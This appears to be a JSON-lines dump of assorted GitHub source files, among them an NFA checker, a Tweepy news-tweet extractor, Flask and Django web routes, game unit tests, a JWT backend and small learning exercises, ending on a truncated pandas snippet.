install_requires=requirements,\n zip_safe = False,\n )","repo_name":"mosayebi/protein_design_with_isambard","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9090639058","text":"file_name, input_name, word = map(str, input().split())\r\n\r\nf = open(input_name, \"r\")\r\n\r\ncounter = 0\r\nsigma = []\r\nstates = []\r\nfinal_states = []\r\nstart_state = []\r\n\r\ntransitions = []\r\n\r\nvalid_NFA = True\r\n\r\nf.readline()\r\nf.readline()\r\nf.readline()\r\n\r\nfor line in f:\r\n line = line.strip(\"\\n\")\r\n if line == \"Sigma:\":\r\n letter = f.readline().strip(\"\\n\")\r\n letter = letter.strip(\" \")\r\n while letter != 
\"End\":\r\n sigma.append(letter)\r\n letter = f.readline().strip(\"\\n\")\r\n letter = letter.strip(\" \")\r\n counter = counter + 1\r\n if counter != 3:\r\n f.readline()\r\n f.readline()\r\n f.readline()\r\n elif line == \"States:\":\r\n state = f.readline().strip(\"\\n\")\r\n state = state.strip(\" \")\r\n while state != \"End\":\r\n lista_state = state.split(\",\")\r\n if (len(lista_state) == 1):\r\n states.append(state)\r\n else:\r\n lista_state[0] = lista_state[0].strip(\" \")\r\n if len(lista_state[1]) > 1:\r\n final_states.append(lista_state[0])\r\n start_state.append(lista_state[0])\r\n elif lista_state[1] == \"F\":\r\n final_states.append(lista_state[0])\r\n else:\r\n start_state.append(lista_state[0])\r\n states.append(lista_state[0])\r\n state = f.readline().strip(\"\\n\")\r\n state = state.strip(\" \")\r\n counter = counter + 1\r\n if counter != 3:\r\n f.readline()\r\n f.readline()\r\n f.readline()\r\n elif line == \"Transitions:\":\r\n transition = f.readline().strip(\"\\n\")\r\n transition = transition.strip(\" \")\r\n while transition != \"End\":\r\n transitions.append(transition)\r\n transition = f.readline().strip(\"\\n\")\r\n transition = transition.strip(\" \")\r\n counter = counter + 1\r\n if counter != 3:\r\n f.readline()\r\n f.readline()\r\n f.readline()\r\n\r\ntransitions_matrix = [[[] for i in range(len(states))] for j in range(len(states))]\r\n\r\nfor i in range(len(transitions)):\r\n if valid_NFA == True:\r\n a,b,c = transitions[i].split(\",\")\r\n b = b.strip(\" \")\r\n c = c.strip(\" \")\r\n if a not in states or c not in states or b not in sigma:\r\n valid_NFA = False\r\n else:\r\n x = states.index(a)\r\n y = states.index(c)\r\n transitions_matrix[x][y].append(b)\r\n\r\nif len(start_state) != 1:\r\n valid_NFA = False\r\nelif len(final_states) == 0:\r\n valid_NFA = False\r\nelif start_state[0] not in states:\r\n valid_NFA = False\r\n\r\nif valid_NFA == False:\r\n print(\"Invalid NFA\")\r\nelse:\r\n i = 0\r\n stack = [start_state[0]]\r\n temporary_stack = []\r\n while i != len(word):\r\n for k in range(0, len(stack)):\r\n index = states.index(stack[k])\r\n for j in range(0, len(states)):\r\n if len(transitions_matrix[index][j]) != 0:\r\n for litera in transitions_matrix[index][j]:\r\n if litera == word[i] :\r\n temporary_stack.append(states[j])\r\n\r\n stack=temporary_stack.copy()\r\n temporary_stack.clear()\r\n i = i + 1\r\n\r\n ok=0\r\n for i in range(0, len(stack)):\r\n if stack[i] in final_states:\r\n print(\"Accepted\")\r\n ok=1\r\n break;\r\n if ok==0 :\r\n print(\"Rejected\")\r\n","repo_name":"alien1403/Tema-Laborator-LFA","sub_path":"Tema 2/nfa_acceptance_engine.py","file_name":"nfa_acceptance_engine.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70416210484","text":"'''\n¿Cuál es la salida del siguiente fragmento de código?\n'''\ndef fun(x):\n x +=1\n return x\n\nx = 2\nx = fun(x+1)\nprint(x)\n\n#4\n#5\n#3\n#codigo erroneo","repo_name":"Lubonch/Laboratorios-IFTS11","sub_path":"Tecnicas de Programacion/TP4/Ej41.py","file_name":"Ej41.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27835538293","text":"\"\"\"\nTwitter api: extract tweets\n\"\"\"\n\nimport os\nimport re\nimport sys\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom tweepy.error import TweepError\nimport requests\nimport tweepy\n\nimport 
gn_modules.secure_dotenv as gn_dotenv\n\nHEADERS = {'USER-agent': ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5)'\n                          'AppleWebKit/537.36 (KHTML, like Gecko)'\n                          'Chrome/45.0.2454.101 Safari/537.36')}\n\n# USER = \"libe\"\n# USER = \"lemondefr\"\n# USER = \"lequipe\"\n# USER = \"le_Parisien\"\nUSER = \"LesEchos\"\n# USER = \"LaCroix\"\n# USER = \"Le_Figaro\"\n# USER = \"Mediapart\"\n# USER = \"LeHuffPost\"\n\n\ndef create_api():\n    \"\"\"Create an api with API key and access token\"\"\"\n\n    gn_dotenv.load_dotenv_secure()\n    api_key = os.environ.get('API_KEY')\n    api_secret_key = os.environ.get('API_SECRET_KEY')\n    access_token = os.environ.get('ACCESS_TOKEN')\n    access_token_secret = os.environ.get('ACCESS_TOKEN_SECRET')\n\n    auth = tweepy.OAuthHandler(api_key, api_secret_key)\n    auth.set_access_token(access_token, access_token_secret)\n    _api = tweepy.API(auth, wait_on_rate_limit=True,\n                      wait_on_rate_limit_notify=True)\n\n    try:\n        _api.verify_credentials()\n    except TweepError:\n        print(\"Error during twitter authentication\")\n        sys.exit()\n\n    return _api\n\n\ndef find_url(tweet):\n    \"\"\"Extract link from the tweet\"\"\"\n    regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n    url = re.findall(regex, tweet)\n    return url[0][0]\n\n\ndef get_original_twitter_url(_url):\n    \"\"\"Get the original url from the extracted url\"\"\"\n    response = requests.get(url=_url, headers=HEADERS)\n    data = response.text\n    url = re.search(\"(?P<url>https?://[^\\s]+)\\\"\", data).group(\"url\")\n    url = urlopen(url).url\n    return url\n\n\ndef extract_tweets_and_print_results(_api, max_tweets: int):\n    \"\"\"Extract the given number of tweets and print the results\"\"\"\n    articles_entries = []\n\n    for tweet in tweepy.Cursor(_api.user_timeline, screen_name=USER, tweet_mode=\"extended\").items(limit=max_tweets):\n        try:\n            # print(tweet.full_text)\n            if hasattr(tweet, 'retweeted_status'):\n                link = find_url(tweet.retweeted_status.full_text)\n            else:\n                link = find_url(tweet.full_text)\n        except IndexError:\n            continue\n        print(link)  # print link extracted\n        try:\n            link = get_original_twitter_url(link)\n        except HTTPError:\n            continue\n        articles_entries.append({'link': link, 'date': tweet.created_at})\n\n    print('\\n\\n\\n\\n')\n    for article in articles_entries:\n        print(article['link'])\n        print(article['date'])\n\n    print(\"Total: \" + str(len(articles_entries)))\n\n\napi = create_api()\nextract_tweets_and_print_results(api, 50)\n","repo_name":"getalp/genderednews","sub_path":"examples/example_twitter_api.py","file_name":"example_twitter_api.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"3088267279","text":"import logging\nimport click\n\nlogger = logging.getLogger('nal_blog_cli')\n\n\n@click.group()\ndef cli():\n    import sys\n\n    root = logging.getLogger()\n    root.setLevel(logging.DEBUG)\n\n    ch = logging.StreamHandler(sys.stdout)\n    ch.setLevel(logging.DEBUG)\n    formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n    ch.setFormatter(formatter)\n    root.addHandler(ch)\n\n\n@cli.command()\n@click.option('--rootpath', default='/', help='Root path of the site')\ndef build(rootpath):\n    from .build import write_site\n    logger.info('Writing out site...')\n    write_site({'rootpath': rootpath})\n
    logger.info('...done')\n\n\n@cli.command()\n@click.option('--rootpath', default='/', help='Root path of the site')\ndef watch(rootpath):\n    import time\n    import sys\n    from pelican.utils import folder_watcher\n    from .build import write_site, TEMPLATE_DIR, SITE_ROOT_DIR, POST_DIR, SITE_DIR\n    from .server import get_server\n\n    watchers = {\n        'posts': folder_watcher(POST_DIR, ['.md']),\n        'root': folder_watcher(SITE_ROOT_DIR, ['']),\n        'templates': folder_watcher(TEMPLATE_DIR, ['.html']),\n    }\n\n    server_thread = get_server(path=SITE_DIR)\n    server_thread.daemon = True\n    server_thread.start()\n\n    logger.info('AutoReload setup')\n\n    try:\n        while True:\n            try:\n                # Check source dir for changed files ending with the given\n                # extension in the settings. In the theme dir there is no such\n                # restriction; all files are recursively checked if they\n                # have changed, no matter what extension the filenames\n                # have.\n                modified = {k: next(v) for k, v in watchers.items()}\n\n                if any(modified.values()):\n                    print('\\nModified: {}. re-generating...'.format(\n                        ', '.join(k for k, v in modified.items() if v)))\n\n                    write_site({'rootpath': rootpath})\n            except KeyboardInterrupt:\n                logger.warning(\"Keyboard interrupt, quitting.\")\n                break\n\n            except Exception:\n                logger.exception('Failed to regenerate website. Eating exception, will try again.')\n            finally:\n                time.sleep(.5)  # sleep to avoid cpu load\n\n    except Exception as e:\n        logger.exception('Failed to regenerate website. Exiting.')\n        sys.exit(getattr(e, 'exitcode', 1))\n","repo_name":"voidfiles/blog-test","sub_path":"nalblog/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74893710963","text":"from django.urls import path\nfrom . import views\n\n# Redirecting the 'fill_form' action specified in the form
to views.py and executing the function fill_form\nurlpatterns = [\n path('form/daily_form', views.fill_daily_form, name='fill_form'),\n path('form/fill_form', views.fill_form),\n path('loginForm', views.loginForm),\n path('login', views.login),\n path('table', views.table),\n path('loginTable', views.loginTable)\n]\n\nhandler404 = 'daily_form.views.custom_404'\nhandler500 = 'daily_form.views.custom_500'","repo_name":"HariVP03/master-covidality","sub_path":"covidality/daily_form/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70901673521","text":"wintable = {\n '가위' : '보',\n '바위' : '가위',\n '보' : '바위'\n }\n\n\ndef rsp(mine,yours) :\n if mine == yours : \n return 'draw'\n elif wintable[mine] == yours :\n return 'win'\n else :\n return 'lose'\n \nresult = rsp('가위','바위')\n\nmessages = {\n 'win' : '이겼어~!',\n 'draw' : 'ㄲㅂ 비겨써',\n 'lose' : 'Wls'\n }\n \nprint(messages[result])","repo_name":"khy0425/School_Project","sub_path":"python/dict_basic.py","file_name":"dict_basic.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21656713054","text":"import collections\nimport os\nimport pathlib\nimport random\nimport string\nfrom io import BytesIO\n\nimport bleach\nfrom PIL import Image\nfrom flask import Blueprint, render_template, redirect, url_for, request\nfrom flask_login import login_required, current_user\n# from flask_weasyprint import render_pdf, HTML\n\nfrom app import app, __VIEWER__\nfrom database_functions import get_all_user_locations, \\\n get_all_item_types, \\\n update_item_by_id, get_item_by_slug, add_images_to_item, delete_images_from_item, set_item_main_image, \\\n find_inventory_by_slug, \\\n get_item_fields, get_all_item_fields, \\\n get_all_fields, set_field_status, update_item_fields, \\\n set_inventory_default_fields, save_inventory_fieldtemplate, get_user_location_by_id, unrelate_items_by_id, \\\n find_item_by_slug, relate_items_by_id, __PUBLIC, find_user_by_username\nfrom utils import correct_image_orientation\n\nitem_routes = Blueprint('item', __name__)\n\n\n@item_routes.context_processor\ndef my_utility_processor():\n def item_tag_to_string(item_tag_list):\n tag_arr = []\n for tag in item_tag_list:\n tag_arr.append(tag.tag.replace(\"@#$\", \" \"))\n return \",\".join(tag_arr)\n\n return dict(item_tag_to_string=item_tag_to_string)\n\n\n# @item_routes.route('/item/save-pdf', methods=['POST'])\n# @login_required\n# def items_save_pdf():\n# if request.method == 'POST':\n# html = item_with_username_and_inventory()\n#\n# return render_pdf(HTML(string=html))\n\n #return item_with_username_and_inventory()\n\n\n@item_routes.route('/@//')\ndef item_with_username_and_inventory(username: str, inventory_slug: str, item_slug: str):\n inventory_owner_username = username\n inventory_owner = None\n inventory_owner_id = None\n\n user_is_authenticated = current_user.is_authenticated\n all_user_locations_ = None\n if user_is_authenticated:\n all_user_locations_ = get_all_user_locations(user=current_user)\n\n requested_user = current_user\n requested_user_id = requested_user.id\n\n if current_user == inventory_owner_username:\n inventory_owner = current_user\n inventory_owner_id = inventory_owner.id\n\n # check for default inventory\n if inventory_slug == \"d\":\n inventory_slug = f\"default-{username}\"\n\n else:\n requested_user = None\n requested_user_id = 
None\n\n if inventory_owner is None:\n inventory_owner = find_user_by_username(username=inventory_owner_username)\n if inventory_owner is not None:\n inventory_owner_id = inventory_owner.id\n\n # get the inventory to check permissions\n inventory_, user_inventory_ = find_inventory_by_slug(inventory_slug=inventory_slug,\n inventory_owner_id=inventory_owner_id,\n requesting_user_id=requested_user_id)\n\n if inventory_ is None:\n return render_template('404.html', message=\"No such item or you do not have access to this item\"), 404\n\n item_access_level = __VIEWER__\n if user_inventory_ is None:\n if inventory_.access_level != __PUBLIC:\n return render_template('404.html', message=\"No such item or you do not have access to this item\"), 404\n else:\n item_access_level = user_inventory_.access_level\n\n item_data_ = get_item_by_slug(item_slug=item_slug)\n if item_data_ is not None:\n item_, item_type_string, inventory_item_ = item_data_\n else:\n item_, item_type_string, inventory_item_ = None, None, None\n\n if item_ is None or inventory_item_ is None:\n return render_template('404.html', message=\"No such item or you do not have access to this item\"), 404\n\n item_fields = get_item_fields(item_id=item_.id)\n\n ii = {}\n for field_data in item_fields:\n field_ = field_data[0]\n item_field_ = field_data[1]\n template_field_ = field_data[2]\n ii[template_field_.order] = [field_, item_field_]\n\n od = collections.OrderedDict(sorted(ii.items()))\n\n dfdf = {}\n for k, v in od.items():\n dfdf[v[0]] = v[1]\n\n item_fields = dict(dfdf)\n\n all_item_fields = dict(get_all_item_fields(item_id=item_.id))\n all_fields = dict(get_all_fields())\n\n item_location = None\n if user_is_authenticated and item_access_level != __VIEWER__:\n user_location = get_user_location_by_id(location_id=item_.location_id, user_id=current_user.id)\n if user_location is not None:\n item_location = user_location\n\n all_item_types_ = get_all_item_types()\n\n return render_template('item/item.html', name=username, item_fields=item_fields, all_item_fields=all_item_fields,\n all_fields=all_fields, inventory_slug=inventory_.slug, inventory=inventory_,\n item=item_, username=username, item_type=item_type_string,\n all_item_types=all_item_types_,\n all_user_locations=all_user_locations_, item_location=item_location,\n image_dir=app.config['UPLOAD_FOLDER'], item_access_level=item_access_level)\n\n\n@item_routes.route('/item/edit/', methods=['POST'])\n@login_required\ndef edit_item(item_id):\n if request.method == 'POST':\n form_data = dict(request.form)\n del form_data[\"csrf_token\"]\n item_id = form_data[\"item_id\"]\n del form_data[\"item_id\"]\n\n item_slug = form_data[\"item_slug\"]\n del form_data[\"item_slug\"]\n\n inventory_slug = form_data[\"inventory_slug\"]\n del form_data[\"inventory_slug\"]\n\n username = form_data[\"username\"]\n del form_data[\"username\"]\n\n item_name = request.form.get(\"item_name\")\n item_description = request.form.get(\"item_description\")\n item_quantity = request.form.get(\"item_quantity\")\n\n item_name = bleach.clean(item_name)\n item_description = bleach.clean(item_description)\n item_quantity = bleach.clean(item_quantity)\n\n del form_data[\"item_name\"]\n del form_data[\"item_description\"]\n del form_data[\"item_quantity\"]\n\n item_tags = request.form.get(\"item_tags\")\n item_tags = bleach.clean(item_tags)\n if item_tags != '':\n item_tags = item_tags.strip().split(\",\")\n else:\n item_tags = []\n del form_data[\"item_tags\"]\n\n item_type = request.form.get(\"item_type\")\n 
item_location = request.form.get(\"item_location\")\n item_specific_location = request.form.get(\"item_specific_location\")\n\n del form_data[\"item_type\"]\n del form_data[\"item_location\"]\n del form_data[\"item_specific_location\"]\n\n form_data = {int(k): v for k, v in form_data.items()}\n\n update_item_fields(data=form_data, item_id=int(item_id))\n\n new_item_data = {\n \"id\": item_id,\n \"name\": item_name,\n \"description\": item_description,\n \"item_type\": item_type,\n \"item_quantity\": item_quantity,\n \"item_location\": item_location,\n \"item_specific_location\": item_specific_location,\n \"item_tags\": item_tags\n }\n\n new_item_slug = update_item_by_id(item_data=new_item_data, item_id=int(item_id), user=current_user)\n return redirect(url_for('item.item_with_username_and_inventory',\n username=username,\n inventory_slug=inventory_slug,\n item_slug=new_item_slug))\n\n\n@item_routes.route('/item/fields', methods=['POST'])\n@login_required\ndef edit_item_fields():\n if request.method == 'POST':\n json_data = request.json\n item_id = json_data['item_id']\n field_ids = json_data['field_ids']\n set_field_status(item_id, field_ids, is_visible=True)\n\n return True\n\n\n@item_routes.route('/default-inventory_fields', methods=['POST'])\n@login_required\ndef edit_inv_default_fields():\n if request.method == 'POST':\n json_data = request.json\n inventory_id = json_data['inventory_id']\n field_ids = json_data['field_ids']\n\n field_ids = [str(x) for x in field_ids]\n\n set_inventory_default_fields(inventory_id=inventory_id, user=current_user, default_fields=field_ids)\n\n return True\n\n\n@item_routes.route('/inventory/save-inventory-template', methods=['POST'])\n@login_required\ndef save_inventory_template():\n if request.method == 'POST':\n form_data = dict(request.form)\n inventory_id = form_data['inventory_id']\n\n inventory_slug = form_data['inventory_slug']\n inventory_template = form_data['inventory_template']\n if inventory_template == '-1':\n inventory_template = None\n save_inventory_fieldtemplate(inventory_id=inventory_id,\n inventory_template=inventory_template, user_id=current_user.id)\n\n return redirect(url_for('items.items_with_username_and_inventory',\n username=current_user.username, inventory_slug=inventory_slug))\n\n\n@item_routes.route(\"/item/relate-items\", methods=[\"POST\"])\ndef relate_items():\n if request.method == 'POST':\n item_id = bleach.clean(request.form.get(\"item_id\"))\n item_id = int(item_id)\n relateditem_slug = bleach.clean(request.form.get(\"relateditem\"))\n inventory_slug = bleach.clean(request.form.get(\"inventory_slug\"))\n item_slug = bleach.clean(request.form.get(\"item_slug\"))\n\n relateditem_ = find_item_by_slug(item_slug=relateditem_slug, user_id=current_user.id)\n\n if relateditem_.id != item_id:\n relate_items_by_id(item1_id=item_id, item2_id=relateditem_.id)\n\n return redirect(url_for('item.item_with_username_and_inventory',\n username=current_user.username,\n inventory_slug=inventory_slug,\n item_slug=item_slug))\n\n\n@item_routes.route('/unrelate-items', methods=['POST'])\ndef unrelate_items():\n if request.method == 'POST':\n json_data = request.json\n item1 = json_data['item1']\n item2 = json_data['item2']\n item1 = int(item1)\n item2 = int(item2)\n unrelate_items_by_id(item1_id=item1, item2_id=item2)\n\n\n@item_routes.route(\"/item/images/remove\", methods=[\"POST\"])\ndef delete_images():\n if request.method == 'POST':\n json_data = request.json\n item_id = json_data['item_id']\n item_slug = json_data['item_slug']\n 
inventory_slug = json_data['inventory_slug']\n        username = json_data['username']\n        image_list = json_data['image_id_list']\n\n        delete_images_from_item(item_id=item_id, image_ids=image_list, user=current_user)\n\n        return redirect(url_for('item.item_with_username_and_inventory',\n                                username=username,\n                                inventory_slug=inventory_slug,\n                                item_slug=item_slug))\n\n\n@item_routes.route(\"/item/images/setmainimage\", methods=[\"POST\"])\ndef set_main_image():\n    if request.method == 'POST':\n        json_data = request.json\n        main_image = json_data['main_image']\n        item_slug = json_data['item_slug']\n        inventory_slug = json_data['inventory_slug']\n        item_id = json_data['item_id']\n        username = json_data['username']\n\n        main_image = main_image.replace('/uploads/', '')\n\n        set_item_main_image(main_image_url=main_image, item_id=item_id, user=current_user)\n\n        return redirect(url_for('item.item_with_username_and_inventory',\n                                username=username,\n                                inventory_slug=inventory_slug,\n                                item_slug=item_slug))\n\n\n@item_routes.route(\"/item/images/upload\", methods=[\"POST\"])\ndef upload():\n    new_filename_list = []\n\n    username = request.form.get(\"username\")\n    item_id = request.form.get(\"item_id\")\n    item_slug = request.form.get(\"item_slug\")\n    inventory_slug = request.form.get(\"inventory_slug\")\n\n    uploaded_files = request.files.getlist(\"file[]\")\n    for file in uploaded_files:\n        file_name, file_extension = os.path.splitext(file.filename)\n\n        new_filename = ''.join(random.choices(string.ascii_lowercase, k=15)) + file_extension\n        new_filename_list.append(new_filename)\n\n        in_mem_file = BytesIO(file.read())\n        image = Image.open(in_mem_file)\n\n        image = correct_image_orientation(image=image)\n\n        image = image.convert('RGB')\n        image.thumbnail((600, 600))\n        in_mem_file = BytesIO()\n        image.save(in_mem_file, format=\"JPEG\")\n        in_mem_file.seek(0)\n\n        pathlib.Path(os.path.join(app.config['UPLOAD_FOLDER'], new_filename)).write_bytes(\n            in_mem_file.getbuffer().tobytes())\n\n    add_images_to_item(item_id=item_id, filenames=new_filename_list, user=current_user)\n\n    return redirect(url_for('item.item_with_username_and_inventory',\n                            username=username,\n                            inventory_slug=inventory_slug,\n                            item_slug=item_slug))\n","repo_name":"snclucas/thing-list","sub_path":"routes/item_routes.py","file_name":"item_routes.py","file_ext":"py","file_size_in_byte":13157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37273314445","text":"from PIL import Image\nfrom pylab import *\nimport sys\n\nlower_bound, upper_bound = 50, 255\n\ndef adjacent_black_pixels(i, j, pixels):\n    num_black = 0\n    for m in range(-1, 2):\n        for n in range(-1, 2):\n            if pixels[i+m][j+n] <= lower_bound:\n                num_black += 1\n    return num_black\n\n#Returns a list of lists of the edges of the given image\ndef find_boundary(img_path):\n    im = Image.open(img_path)\n    pixels = list(im.getdata())\n    width, height = im.size\n    pixels = [pixels[i * width:(i + 1) * width] for i in xrange(height)]\n    arr = [[0 for _ in range(width)] for _ in range(height)]\n    for i in range(1, len(pixels) - 1):\n        for j in range(1, len(pixels[0]) - 1):\n            if (pixels[i][j] > lower_bound) and (pixels[i][j] <= upper_bound) and (adjacent_black_pixels(i, j, pixels) > 0):\n                arr[i][j] = 255\n    return arr\n\npath_list = open(sys.argv[1], 'r')\nfor img_path in path_list:\n    im = Image.fromarray(np.array(find_boundary(img_path)).astype(np.uint8))\n    im.save(img_path[:-3] + 
\"bmp\")","repo_name":"jeffmahler/GPIS","sub_path":"scripts/binary-image-processing/edge_tracker.py","file_name":"edge_tracker.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"75"} +{"seq_id":"15187860379","text":"import unittest\nfrom unittest.mock import Mock, patch\n\nfrom barbarian.world import World\n\n\nclass LevelMock(Mock):\n \"\"\"\n Custom mock for level objects, setting tested attributes\n to dummy values.\n\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.start_pos = (0, 0)\n self.exit_pos = (1, 1)\n\n self.actors = Mock()\n\n\nclass TestWorld(unittest.TestCase):\n\n def test_current_depth_property(self):\n w = World(0, 0)\n # Incrementing current also increments max\n w.current_depth += 1\n self.assertEqual(w.current_depth, 2)\n self.assertEqual(w.max_depth, 2)\n w.current_depth += 1\n self.assertEqual(w.current_depth, 3)\n self.assertEqual(w.max_depth, 3)\n # Decrement leaves max alone\n w.current_depth -= 1\n self.assertEqual(w.current_depth, 2)\n self.assertEqual(w.max_depth, 3)\n\n def test_current_level(self):\n w = World(0, 0)\n\n w.insert_level(1)\n self.assertEqual(1, w.current_level)\n\n w.insert_level(2)\n w.current_depth += 1\n self.assertEqual(2, w.current_level)\n\n def test_insert_level(self):\n w = World(0, 0)\n\n w.insert_level('first')\n self.assertEqual(1, len(w.levels))\n self.assertEqual('first', w.levels[-1])\n\n w.insert_level('second')\n w.current_depth += 1\n self.assertEqual(2, len(w.levels))\n self.assertEqual('second', w.levels[-1])\n\n w.insert_level('replace second', replace_current=True)\n w.current_depth += 1\n self.assertEqual(2, len(w.levels))\n self.assertEqual('replace second', w.levels[-1])\n\n w.insert_level('third')\n w.current_depth += 1\n self.assertEqual(3, len(w.levels))\n self.assertEqual('third', w.levels[-1])\n\n @patch('barbarian.world.Level')\n def test_new_level(self, mock_level):\n w = World(0, 0)\n\n new_level = w.new_level()\n mock_level.assert_called_once_with(w.level_w, w.level_h, depth=1)\n new_level.build_map.assert_called_once()\n new_level.populate.assert_called_once()\n\n @patch('barbarian.world.Level', new_callable=LevelMock)\n def test_change_level_new_depth(self, mock_level):\n w = World(0, 0)\n w.insert_level(w.new_level())\n\n player = Mock()\n w.change_level(1, player)\n\n self.assertEqual(2, w.current_depth)\n self.assertEqual(2, len(w.levels))\n mock_level.assert_called_with(\n w.level_w, w.level_h, depth=w.current_depth)\n\n self.assertEqual(\n (player.pos.x, player.pos.y), w.current_level.start_pos)\n w.current_level.enter.assert_called_once_with(player)\n\n @patch('barbarian.world.Level', new_callable=LevelMock)\n def test_change_level_new_replace(self, mock_level):\n w = World(0, 0)\n w.insert_level(w.new_level())\n\n player = Mock()\n w.change_level(0, player)\n\n self.assertEqual(1, w.current_depth)\n self.assertEqual(1, len(w.levels))\n mock_level.assert_called_with(\n w.level_w, w.level_h, depth=w.current_depth)\n\n self.assertEqual(\n (player.pos.x, player.pos.y), w.current_level.start_pos)\n w.current_level.enter.assert_called_once_with(player)\n\n @patch('barbarian.world.Level', new_callable=LevelMock)\n def test_change_level_backtracking(self, mock_level):\n w = World(0, 0)\n w.insert_level(w.new_level())\n w.current_depth += 1\n w.insert_level(w.new_level())\n\n self.assertEqual(2, w.current_depth)\n self.assertEqual(2, len(w.levels))\n\n player = Mock()\n 
w.change_level(-1, player)\n\n self.assertEqual(1, w.current_depth)\n self.assertEqual(2, len(w.levels))\n self.assertEqual(2, mock_level.call_count)\n\n self.assertEqual(\n (player.pos.x, player.pos.y), w.current_level.exit_pos)\n w.current_level.enter.assert_called_once_with(player)\n\n def test_change_level_with_no_initial_level(self):\n w = World(0, 0)\n\n player = Mock()\n for delta in (-1, 0, 1):\n self.assertRaises(AssertionError, w.change_level, delta, player)\n","repo_name":"raphigaziano/barbar3","sub_path":"tests/unit/test_world.py","file_name":"test_world.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37867640431","text":"from __future__ import unicode_literals\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .exceptions import TokenBackendError\nfrom .utils import format_lazy\n\n\nALLOWED_ALGORITHMS = (\n 'HS256',\n)\n\n\nclass TokenBackend(object):\n def __init__(self, secret, algorithm):\n if algorithm not in ALLOWED_ALGORITHMS:\n raise TokenBackendError(format_lazy(_(\"Unrecognized algorithm type '{}'\"), algorithm))\n\n self.secret = secret\n self.algorithm = algorithm\n\n def encode(self, payload):\n \"\"\"\n Returns an encoded token for the given payload dictionary.\n \"\"\"\n raise NotImplementedError # pragma: no cover\n\n def decode(self, token):\n \"\"\"\n Performs a low-level validation of the given base64 encoded token and\n returns its payload dictionary.\n\n Raises a `TokenBackendError` if the token is malformed or if its\n signature check fails.\n \"\"\"\n raise NotImplementedError # pragma: no cover\n\n\nclass PythonJOSEBackend(TokenBackend):\n def __init__(self, *args, **kwargs):\n super(PythonJOSEBackend, self).__init__(*args, **kwargs)\n\n from jose import jwt\n from jose.exceptions import JOSEError\n\n self.jwt = jwt\n self.JOSEError = JOSEError\n\n def encode(self, payload):\n \"\"\"\n Returns an encoded token for the given payload dictionary.\n \"\"\"\n return self.jwt.encode(payload, self.secret, algorithm=self.algorithm)\n\n def decode(self, token):\n \"\"\"\n Performs a low-level validation of the given token and returns its\n payload dictionary.\n\n Raises a `TokenBackendError` if the token is malformed, if its\n signature check fails, or if its 'exp' claim indicates it has expired.\n \"\"\"\n try:\n return self.jwt.decode(token, self.secret, algorithms=[self.algorithm])\n except self.JOSEError:\n raise TokenBackendError(_('Token is invalid or expired'))\n","repo_name":"lucieneferri/bookstore","sub_path":"venv/lib/python3.8/site-packages/rest_framework_simplejwt/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5896823497","text":"import pandas as pd\nimport numpy as np\n\nfrom datetime import datetime\n\n\ndates = pd.date_range(datetime.now().date(), periods=8)\ndf = pd.DataFrame(np.random.randn(8, 4), columns=['A', 'B', 'C', 'D']) # index=dates\ndf['Dates'] = dates\n\nmountain_head = pd.Series(\n [2061, 2035.8, 2028.5, 2022.5, 2016.4],\n index=['Goverla', 'Brebenskyl', 'Pip_Ivan', 'Petros', 'Gutin_Tomnatik'],\n name='Height, m',\n dtype=float\n)\n\ncontacts = pd.DataFrame(\n {\n 'name': [\n 'Allen Raymond',\n 'Chaim Lewis',\n 'Kennedy Lane',\n 'Wylie Pope',\n 'Cyrus Jackson'\n ],\n 'email': [\n 'allen@mail.com',\n 'chaim@mail.com',\n 'kennedy@mail.comn',\n 'wylie@mail.com',\n 
